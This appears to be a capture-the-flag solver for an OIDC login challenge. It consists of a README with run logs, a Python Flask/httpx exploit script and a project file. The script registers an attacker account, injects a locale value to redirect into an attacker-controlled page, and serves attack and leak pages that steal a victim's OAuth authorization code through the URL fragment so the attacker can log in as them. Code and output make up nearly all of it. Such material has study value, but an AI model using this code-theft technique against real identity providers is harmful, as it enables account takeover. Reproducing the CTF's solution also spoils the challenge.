OIDC転生おじさん solver

README.md

Solution

1. Start server

$ uv run main.py
login: <Response [200 OK]>
register: <Response [302 Found]>
callback: <Response [302 Found]> <Cookies[<Cookie ojimemo_session=eyJzdWIiOiJlYmUzNjMyMi0wMDY0LTQ4N2QtOTYzNC1iZDg0NmEwYWZkYjkiLCJlbWFpbCI6IjY1MTEzMDg5QHBveW9wb3lvLnBveW9wb3lvIn0%3D.xa5dC8HTYUd%2Bh%2Fv8raNvqitawg88ARed9GAamRksrPw for ojimemo.127-0-0-1.nip.io />]>
change locale: <Response [302 Found]>
callback: <Response [302 Found]> 30abbc22393de40899c141bb8670791b2c6776f9d43406fa504e3739fc02b894
report this URL: http://host.docker.internal:3000/attack
 * Serving Flask app 'main'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:3000
Press CTRL+C to quit

2. Report http://host.docker.internal:3000/attack

127.0.0.1 - - [11/Apr/2025 15:54:32] "GET /attack HTTP/1.1" 200 -
127.0.0.1 - - [11/Apr/2025 15:54:32] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [11/Apr/2025 15:54:32] "GET /leak?/ HTTP/1.1" 200 -
127.0.0.1 - - [11/Apr/2025 15:54:32] "GET /?token= HTTP/1.1" 404 -
127.0.0.1 - - [11/Apr/2025 15:54:33] "GET /leak?/callback HTTP/1.1" 200 -
127.0.0.1 - - [11/Apr/2025 15:54:33] "GET /?token=?code=2760b611134ce5a52aa3d1b7bec76698365864e140e4ce3245843a6fcbb0ac7f HTTP/1.1" 404 -

3. Access with leaked code and get flag IERAE{dummy}

http://ojimemo.127-0-0-1.nip.io:36000/callback?code=2760b611134ce5a52aa3d1b7bec76698365864e140e4ce3245843a6fcbb0ac7f

main.py

import httpx
import flask
import random

ATTACKER_CODE = ""
APP_HOST = 'http://ojimemo.127-0-0-1.nip.io:36000'
IDP_HOST = 'http://ojiid.127-0-0-1.nip.io:36001'
SERVER_HOST = 'host.docker.internal:3000'
ATTACK_URL = f'{SERVER_HOST}/attack'
LEAK_URL = f'{SERVER_HOST}/leak'

app = flask.Flask(__name__)

@app.route('/attack')
def attack():
    html = f"""
<script>
const url1 = `{APP_HOST}/en/callback?code={ATTACKER_CODE}` // copied URL
const url2 = `{IDP_HOST}/login?client_id=ojimemo&redirect_uri={APP_HOST}%2Fcallback%23&state=&scope=openid+email+profile&response_type=code&nonce=15c167d69abd630d954b30b9c09d55db`
win = window.open(url1)
setTimeout(() => {{
  win.location = url2
}}, 1000)
</script>
"""
    return html

@app.route('/leak')
def leak():
    html = """
<script>
location = `/?token=${location.hash.slice(1)}`
</script>
"""
    return html

def main():
    global ATTACKER_CODE
    
    # random username and password
    email = str(random.randint(10000000, 99999999)) + '@poyopoyo.poyopoyo'
    password = str(random.randint(10000000, 99999999))

    # Move to login page
    login_url = f'{APP_HOST}/login'
    res = httpx.get(login_url, follow_redirects=True)
    print("login:", res)

    # Register user
    register_url = f'{IDP_HOST}/login'
    data = {
        'email': email,
        'password': password,
    }
    res = httpx.post(register_url, data=data, cookies=res.cookies)
    attacker_idp_cookie = res.cookies
    print("register:", res)

    # Access callback
    res = httpx.get(res.headers['Location'])
    attacker_memo_cookie = res.cookies
    print("callback:", res, attacker_memo_cookie)

    # Change locale
    change_locale_url = f'{APP_HOST}/en/locale'
    data = {
        'lang': '/' + LEAK_URL + '?'
    }
    httpx.post(change_locale_url, data=data, cookies=attacker_memo_cookie)
    print("change locale:", res)

    # Issue callback URL again
    res = httpx.get(login_url)
    res = httpx.get(res.headers['Location'], cookies=attacker_idp_cookie) # /auth
    res = httpx.get(IDP_HOST + res.headers['Location'], cookies=attacker_idp_cookie) # /login
    ATTACKER_CODE = res.headers['Location'].split('code=')[1]
    print("callback:", res, ATTACKER_CODE)

    print("report this URL:", "http://" + ATTACK_URL)

    # Start server
    app.run(port=3000, host='0.0.0.0')

if __name__ == "__main__":
    main()

pyproject.toml

[project]
name = "solution"
version = "0.1.0"
description = "Add your description here"
readme = "README.md"
requires-python = ">=3.13"
dependencies = [
    "flask>=3.1.0",
    "httpx>=0.28.1",
]